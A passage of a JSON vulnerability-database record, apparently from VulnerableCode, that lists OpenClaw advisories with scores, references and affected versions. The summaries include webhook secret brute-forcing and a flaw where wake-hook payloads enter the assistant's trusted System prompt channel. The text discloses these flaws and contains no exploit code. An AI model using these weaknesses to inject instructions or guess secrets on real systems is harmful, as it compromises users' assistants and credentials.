id":"GHSA-8372-7vhw-cm6q","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-
8372-7vhw-cm6q"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-redaction-bypass-via-sourceconfig-and-runtimeconfig-aliases","reference_id":"openclaw-redaction-bypass-via-sourceconfig-and-runtimeconfig-aliases","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:57Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-redaction-bypass-via-sourceconfig-and-runtimeconfig-aliases"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109967?format=json","purl":"pkg:npm/openclaw@2026.4.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulner
ability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.14"}],"aliases":["CVE-2026-43528","GHSA-8372-7vhw-cm6q"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dfdk-dhwf-9yaj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90865?format=json","vulnerability_id":"VCID-djqx-bwuu-4uc1","summary":"OpenClaw: Telegram Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Secret\n## Summary\n\nTelegram Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Secret\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nTelegram webhook auth previously rejected bad secrets but did not throttle repeated guesses, allowing brute-force attempts against weak webhook secrets. Commit `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7` adds repeated-guess throttling before auth failure responses.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7`.\n\n## Fix Commit(s)\n\n- `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7`\n\n## Release Process Note\n\n`2026.3.25` is the next planned OpenClaw release version in `package.json`. 
This advisory is being published ahead of that npm release so the draft is no longer blocked; once `2026.3.25` is published, the structured patched-version metadata will match the released artifact.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35628","reference_id":"","reference_type":"","scores":[{"value":"0.00071","scoring_system":"epss","scoring_elements":"0.21947","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00071","scoring_system":"epss","scoring_elements":"0.21996","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00071","scoring_system":"epss","scoring_elements":"0.2201","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35628"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c2c136ae9517ddd0789d742a0fdf4c10e8c729a7","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:14:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c2c136ae9517ddd0789d742a0fdf4c10e8c729a7"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vcx4-4qxg-mfp4","reference_id":"","refere
nce_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:14:25Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vcx4-4qxg-mfp4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35628","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35628"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-telegram-webhook-rate-limiting","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:14:25Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-telegram-webhook-rate-limiting"},{"reference_url":"https://github.com/advisories/GHSA-vcx4-4qxg-mfp4","reference_id":"GHSA-vcx4-4qxg-mfp4","reference_type":"","scores":[{"value":"MODERATE","scoring_
system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vcx4-4qxg-mfp4"}],"fixed_packages":[],"aliases":["CVE-2026-35628","GHSA-vcx4-4qxg-mfp4"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-djqx-bwuu-4uc1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90015?format=json","vulnerability_id":"VCID-dmse-bb22-rkcj","summary":"OpenClaw: Authenticated `/hooks/wake` and mapped `wake` payloads are promoted into the trusted `System:` prompt channel\n## Impact\n\nAuthenticated `/hooks/wake` and mapped `wake` payloads are promoted into the trusted `System:` prompt channel.\n\nAn authenticated wake hook or mapped wake payload could be promoted into the trusted System prompt channel instead of an untrusted event.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. 
The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @tdjackey for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jf56-mccx-5f3f","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jf56-mccx-5f3f"},{"reference_url":"https://github.com/advisories/GHSA-jf56-mccx-5f3f","reference_id":"GHSA-jf56-mccx-5f3f","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jf56-mccx-5f3f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vuln
erability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"reso
urce_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["GHSA-jf56-mccx-5f3f"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dmse-bb22-rkcj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90803?format=json","vulnerability_id":"VCID-dsvn-dpb5-tfdz","summary":"Duplicate Advisory: OpenClaw: Unavailable local auth SecretRefs could fall through to remote credentials in local mode\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-qvr7-g57c-mrc7. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.11 contains a credential fallback vulnerability where unavailable local gateway.auth.token and gateway.auth.password SecretRefs are treated as unset, allowing fallback to remote credentials in local mode. Attackers can exploit misconfigured local auth references to cause CLI and helper paths to select incorrect credential sources, potentially bypassing intended local authentication 
boundaries.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qvr7-g57c-mrc7","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qvr7-g57c-mrc7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32970","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32970"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-credential-fallback-logic-bypass-via-unavailable-local-auth-secretrefs","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-credential-fallback-logic-bypass-via-unavailable-local-auth-secretre
fs"},{"reference_url":"https://github.com/advisories/GHSA-vm29-7mq3-9jrg","reference_id":"GHSA-vm29-7mq3-9jrg","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vm29-7mq3-9jrg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q
9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn
13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe
4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4
